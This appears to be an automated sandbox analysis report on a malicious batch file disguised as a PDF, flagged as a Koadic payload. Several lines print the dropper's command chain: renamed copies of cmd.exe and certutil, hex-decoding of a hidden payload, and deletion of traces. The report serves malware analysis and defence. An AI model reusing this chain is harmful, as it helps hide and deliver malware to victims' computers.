Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB18D49_2_00007FF755CB18D4
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA18849_2_00007FF755CA1884
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA2C489_2_00007FF755CA2C48
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CCAC4C9_2_00007FF755CCAC4C
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA6BE09_2_00007FF755CA6BE0
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CCAFBC9_2_00007FF755CCAFBC
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA5B709_2_00007FF755CA5B70
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA3F909_2_00007FF755CA3F90
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA372C9_2_00007FF755CA372C
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA9B509_2_00007FF755CA9B50
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CAAA5410_2_00007FF755CAAA54
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA8DF810_2_00007FF755CA8DF8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB555410_2_00007FF755CB5554
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB785410_2_00007FF755CB7854
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB37D810_2_00007FF755CB37D8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA341010_2_00007FF755CA3410
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA6EE410_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CC7F0010_2_00007FF755CC7F00
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB0A6C10_2_00007FF755CB0A6C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCEE8810_2_00007FF755CCEE88
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CAE68010_2_00007FF755CAE680
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA4A3010_2_00007FF755CA4A30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCAA3010_2_00007FF755CCAA30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA222010_2_00007FF755CA2220
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB422410_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA765010_2_00007FF755CA7650
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CAD25010_2_00007FF755CAD250
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA9E5010_2_00007FF755CA9E50
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA524010_2_00007FF755CA5240
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CACE1010_2_00007FF755CACE10
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCD9D010_2_00007FF755CCD9D0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA81D410_2_00007FF755CA81D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA7D3010_2_00007FF755CA7D30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CD153810_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CAB0D810_2_00007FF755CAB0D8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA851010_2_00007FF755CA8510
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB18D410_2_00007FF755CB18D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA188410_2_00007FF755CA1884
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA2C4810_2_00007FF755CA2C48
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCAC4C10_2_00007FF755CCAC4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA6BE010_2_00007FF755CA6BE0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCAFBC10_2_00007FF755CCAFBC
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA5B7010_2_00007FF755CA5B70
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA3F9010_2_00007FF755CA3F90
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA372C10_2_00007FF755CA372C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA9B5010_2_00007FF755CA9B50
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF755CB498C appears 40 times
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF755CB081C appears 36 times
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF755CB3448 appears 72 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C5510D10 appears 181 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C550ABFC appears 818 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C55664A6 appears 173 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C548BC9C appears 280 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C545D1C8 appears 41 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C54EEB98 appears 93 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C5517BAC appears 34 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C5517D70 appears 35 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C555F1B8 appears 183 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6C555F11C appears 37 times
Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engineClassification label: mal84.bank.evad.winBAT@20/8@0/0
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,3_2_00007FF755CA32B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C553826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,6_2_00007FF6C553826C
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CCFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,3_2_00007FF755CCFB54
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54946C0 CoCreateInstance,#357,SysFreeString,6_2_00007FF6C54946C0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5516320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,6_2_00007FF6C5516320
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 1x40 CONTAINER.PDF-.batReversingLabs: Detection: 27%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
Source: 1x40 CONTAINER.PDF-.batStatic file information: File size 3675586 > 1048576
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: alpha.exe.2.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: alpha.exe.2.drStatic PE information: section name: .didat
Source: kn.exe.4.drStatic PE information: section name: .didat
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5483668 push rsp; ret 6_2_00007FF6C5483669
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
Source: C:\Users\Public\alpha.exeAPI coverage: 8.9 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF755CC7B4C
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF755CC7B4C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54CC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF6C54CC6F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C553234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF6C553234C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5533100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6C5533100
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6C55310C4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5536F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF6C5536F80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5513674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF6C5513674
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF6C54DD4A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C549D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C549D440
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6C54DB3D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF6C54D5E58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5531B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF6C5531B04
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55319F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6C55319F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF6C54DDBC0
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF755CC7B4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF755CC7B4C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF6C551511C
